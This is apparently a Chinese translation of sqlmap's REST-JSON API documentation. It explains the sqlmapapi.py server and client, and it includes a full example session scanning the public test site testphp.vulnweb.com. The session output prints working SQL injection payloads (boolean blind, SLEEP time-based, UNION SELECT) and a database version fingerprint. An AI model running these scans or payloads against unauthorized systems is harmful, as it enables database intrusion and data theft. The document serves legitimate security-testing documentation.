返回介绍

API(REST JSON)

发布于 2024-06-22 19:17:49 字数 25642 浏览 0 评论 0 收藏 0

译自:API (REST-JSON)

sqlmap 可以通过 REST-JSON API 运行,即使用 JSON 格式的 REST(REpresentational State Transfer 的缩写)风格的 API 来进行服务器和客户端实例之间的通信。直白地讲,服务器使用 sqlmap 进行扫描,而客户端设置 sqlmap 选项/开关并将结果拉取回来。用于运行 API 的主程序文件是 sqlmapapi.py,而客户端可以在任意用户程序中进行实现。

$ python sqlmapapi.py -hh
Usage: sqlmapapi.py [options]

Options:
  -h, --help            show this help message and exit
  -s, --server          Act as a REST-JSON API server
  -c, --client          Act as a REST-JSON API client
  -H HOST, --host=HOST  Host of the REST-JSON API server (default "127.0.0.1")
  -p PORT, --port=PORT  Port of the the REST-JSON API server (default 8775)
  --adapter=ADAPTER     Server (bottle) adapter to use (default "wsgiref")

通过使用开关 -s 运行 sqlmapapi.py 启用服务器,使用开关 -c 启用客户端,在这两种情况下,用户可以(可选)使用选项 -H(默认为 "127.0.0.1")和选项 -p(默认为 8775)设置监听的 IP 地址和端口。每个客户端的“会话”可以有多个“任务”(例如:运行 sqlmap 扫描),用户可以任意选择某个任务处于当前活动状态。

客户端命令行界面可用的命令有:

  • help——显示可用命令列表以及基本的帮助信息
  • new ARGS——使用提供的参数开始一次新的扫描任务(例如:new -u "http://testphp.vulnweb.com/artists.php?artist=1"
  • use TASKID——切换当前上下文到不同任务(例如:use c04d8c5c7582efb4
  • data——获取并显示当前任务的数据
  • log- 获取并显示当前任务日志
  • status——获取并显示当前任务状态
  • stop——停止当前任务
  • kill——杀死当前任务
  • list——显示所有任务(当前会话)
  • flush——清空所有任务(例如:deletes)
  • exit——退出客户端界面

运行服务器的示例:

$ python sqlmapapi.py -s -H "0.0.0.0"
[12:47:51] [INFO] Running REST-JSON API server at '0.0.0.0:8775'..
[12:47:51] [INFO] Admin ID: 89fd118997840a9bd7fc329ab535b881
[12:47:51] [DEBUG] IPC database: /tmp/sqlmapipc-SzBQnd
[12:47:51] [DEBUG] REST-JSON API server connected to IPC database
[12:47:51] [DEBUG] Using adapter 'wsgiref' to run bottle
[12:48:10] [DEBUG] Created new task: 'a42ddaef02e976f0'
[12:48:10] [DEBUG] [a42ddaef02e976f0] Started scan
[12:48:16] [DEBUG] [a42ddaef02e976f0] Retrieved scan status
[12:48:50] [DEBUG] [a42ddaef02e976f0] Retrieved scan status
[12:48:55] [DEBUG] [a42ddaef02e976f0] Retrieved scan log messages
[12:48:59] [DEBUG] [a42ddaef02e976f0] Retrieved scan data and error messages

运行客户端的示例:

$ python sqlmapapi.py -c -H "192.168.110.1"
[12:47:53] [DEBUG] Example client access from command line:
    $ taskid=$(curl http://192.168.110.1:8775/task/new 2>1 | grep -o -I '[a-f0-9
]\{16\}') && echo $taskid
    $ curl -H "Content-Type: application/json" -X POST -d '{"url": "http://testp
hp.vulnweb.com/artists.php?artist=1"}' http://192.168.110.1:8775/scan/$taskid/st
art
    $ curl http://192.168.110.1:8775/scan/$taskid/data
    $ curl http://192.168.110.1:8775/scan/$taskid/log
[12:47:53] [INFO] Starting REST-JSON API client to 'http://192.168.110.1:8775'..
.
[12:47:53] [DEBUG] Calling http://192.168.110.1:8775
[12:47:53] [INFO] Type 'help' or '?' for list of available commands
api> ?
help        Show this help message
new ARGS    Start a new scan task with provided arguments (e.g. 'new -u "http://
testphp.vulnweb.com/artists.php?artist=1"')
use TASKID  Switch current context to different task (e.g. 'use c04d8c5c7582efb4
')
data        Retrieve and show data for current task
log         Retrieve and show log for current task
status      Retrieve and show status for current task
stop        Stop current task
kill        Kill current task
list        Display all tasks
flush       Flush tasks (delete all tasks)
exit        Exit this client
api> new -u "http://testphp.vulnweb.com/artists.php?artist=1" --banner --flush-s
ession
[12:48:10] [DEBUG] Calling http://192.168.110.1:8775/task/new
[12:48:10] [INFO] New task ID is 'a42ddaef02e976f0'
[12:48:10] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/start
[12:48:10] [INFO] Scanning started
api (a42ddaef02e976f0)> status
[12:48:16] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/statu
s
{
    "status": "running",
    "returncode": null,
    "success": true
}
api (a42ddaef02e976f0)> status
[12:48:50] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/statu
s
{
    "status": "terminated",
    "returncode": 0,
    "success": true
}
api (a42ddaef02e976f0)> log
[12:48:55] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/log
{
    "log": [
        {
            "message": "flushing session file",
            "level": "INFO",
            "time": "12:48:10"
        },
        {
            "message": "testing connection to the target URL",
            "level": "INFO",
            "time": "12:48:10"
        },
        {
            "message": "checking if the target is protected by some kind of WAF/
IPS",
            "level": "INFO",
            "time": "12:48:10"
        },
        {
            "message": "testing if the target URL is stable",
            "level": "INFO",
            "time": "12:48:10"
        },
        {
            "message": "target URL is stable",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "testing if GET parameter 'artist' is dynamic",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "confirming that GET parameter 'artist' is dynamic",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "GET parameter 'artist' is dynamic",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "heuristic (basic) test shows that GET parameter 'artist'
 might be injectable (possible DBMS: 'MySQL')",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "testing for SQL injection on GET parameter 'artist'",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "testing 'AND boolean-based blind - WHERE or HAVING claus
e'",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "GET parameter 'artist' appears to be 'AND boolean-based
blind - WHERE or HAVING clause' injectable (with --string=\"hac\")",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, O
RDER BY or GROUP BY clause (BIGINT UNSIGNED)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING cla
use (BIGINT UNSIGNED)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, O
RDER BY or GROUP BY clause (EXP)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING cla
use (EXP)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING,
 ORDER BY or GROUP BY clause (JSON_KEYS)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING c
lause (JSON_KEYS)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, O
RDER BY or GROUP BY clause (FLOOR)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, OR
DER BY or GROUP BY clause (FLOOR)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, O
RDER BY or GROUP BY clause (EXTRACTVALUE)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, OR
DER BY or GROUP BY clause (EXTRACTVALUE)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, O
RDER BY or GROUP BY clause (UPDATEXML)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, OR
DER BY or GROUP BY clause (UPDATEXML)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, O
RDER BY or GROUP BY clause (FLOOR)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING cla
use (FLOOR)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL OR error-based - WHERE or HAVING clause (
FLOOR)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (E
XTRACTVALUE)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.5 error-based - Parameter replace (B
IGINT UNSIGNED)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.5 error-based - Parameter replace (E
XP)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.7.8 error-based - Parameter replace
(JSON_KEYS)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.0 error-based - Parameter replace (F
LOOR)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL >= 5.1 error-based - Parameter replace (U
PDATEXML)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL >= 5.1 error-based - Parameter replace (E
XTRACTVALUE)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL inline queries'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL > 5.0.11 stacked queries (comment)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL > 5.0.11 stacked queries'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL > 5.0.11 stacked queries (query SLEEP - c
omment)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL < 5.0.12 stacked queries (heavy query - c
omment)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL < 5.0.12 stacked queries (heavy query)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL >= 5.0.12 AND time-based blind'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "GET parameter 'artist' appears to be 'MySQL >= 5.0.12 AN
D time-based blind' injectable ",
            "level": "INFO",
            "time": "12:48:23"
        },
        {
            "message": "testing 'Generic UNION query (NULL) - 1 to 20 columns'",
            "level": "INFO",
            "time": "12:48:23"
        },
        {
            "message": "automatically extending ranges for UNION query injection
 technique tests as there is at least one other (potential) technique found",
            "level": "INFO",
            "time": "12:48:23"
        },
        {
            "message": "'ORDER BY' technique appears to be usable. This should r
educe the time needed to find the right number of query columns. Automatically e
xtending the range for current UNION query injection technique test",
            "level": "INFO",
            "time": "12:48:23"
        },
        {
            "message": "target URL appears to have 3 columns in query",
            "level": "INFO",
            "time": "12:48:23"
        },
        {
            "message": "GET parameter 'artist' is 'Generic UNION query (NULL) -
1 to 20 columns' injectable",
            "level": "INFO",
            "time": "12:48:24"
        },
        {
            "message": "the back-end DBMS is MySQL",
            "level": "INFO",
            "time": "12:48:24"
        },
        {
            "message": "fetching banner",
            "level": "INFO",
            "time": "12:48:24"
        }
    ],
    "success": true
}
api (a42ddaef02e976f0)> data
[12:48:59] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/data
{
    "data": [
        {
            "status": 1,
            "type": 0,
            "value": [
                {
                    "dbms": "MySQL",
                    "suffix": "",
                    "clause": [
                        1,
                        9
                    ],
                    "notes": [],
                    "ptype": 1,
                    "dbms_version": [
                        ">= 5.0.12"
                    ],
                    "prefix": "",
                    "place": "GET",
                    "os": null,
                    "conf": {
                        "code": null,
                        "string": "hac",
                        "notString": null,
                        "titles": false,
                        "regexp": null,
                        "textOnly": false,
                        "optimize": false
                    },
                    "parameter": "artist",
                    "data": {
                        "1": {
                            "comment": "",
                            "matchRatio": 0.85,
                            "trueCode": 200,
                            "title": "AND boolean-based blind - WHERE or HAVING
clause",
                            "templatePayload": null,
                            "vector": "AND [INFERENCE]",
                            "falseCode": 200,
                            "where": 1,
                            "payload": "artist=1 AND 2794=2794"
                        },
                        "5": {
                            "comment": "",
                            "matchRatio": 0.85,
                            "trueCode": 200,
                            "title": "MySQL >= 5.0.12 AND time-based blind",
                            "templatePayload": null,
                            "vector": "AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLE
EPTIME]),[RANDNUM])",
                            "falseCode": null,
                            "where": 1,
                            "payload": "artist=1 AND SLEEP([SLEEPTIME])"
                        },
                        "6": {
                            "comment": "[GENERIC_SQL_COMMENT]",
                            "matchRatio": 0.85,
                            "trueCode": null,
                            "title": "Generic UNION query (NULL) - 1 to 20 colum
ns",
                            "templatePayload": null,
                            "vector": [
                                2,
                                3,
                                "[GENERIC_SQL_COMMENT]",
                                "",
                                "",
                                "NULL",
                                2,
                                false,
                                false
                            ],
                            "falseCode": null,
                            "where": 2,
                            "payload": "artist=-5376 UNION ALL SELECT NULL,NULL,
CONCAT(0x716b706a71,0x4a754d495377744d4273616c436b4b6a504164666a5572477241596649
704c68614672644a477474,0x7162717171)-- aAjy"
                        }
                    }
                }
            ]
        },
        {
            "status": 1,
            "type": 2,
            "value": "5.1.73-0ubuntu0.10.04.1"
        }
    ],
    "success": true,
    "error": []
}
api (a42ddaef02e976f0)> exit
$

General codes used in response JSON data:

响应中的 JSON 数据通用码:

  • status:

      0 - in progress
      1 - complete
    
  • type:

      0 - target
      1 - techniques
      2 - dbms_fingerprint
      3 - banner
      4 - current_user
      5 - current_db
      6 - hostname
      7 - is_dba
      8 - users
      9 - passwords
      10 - privileges
      11 - roles
      12 - dbs
      13 - tables
      14 - columns
      15 - schema
      16 - count
      17 - dump_table
      18 - search
      19 - sql_query
      20 - common_tables
      21 - common_columns
      22 - file_read
      23 - file_write
      24 - os_cmd
      25 - reg_read
      26 - statements
    
  • returncode

      null - still running
      0 - ended gracefully
      1 - general error occurred
      255 - unhandled exception
    

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据
    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文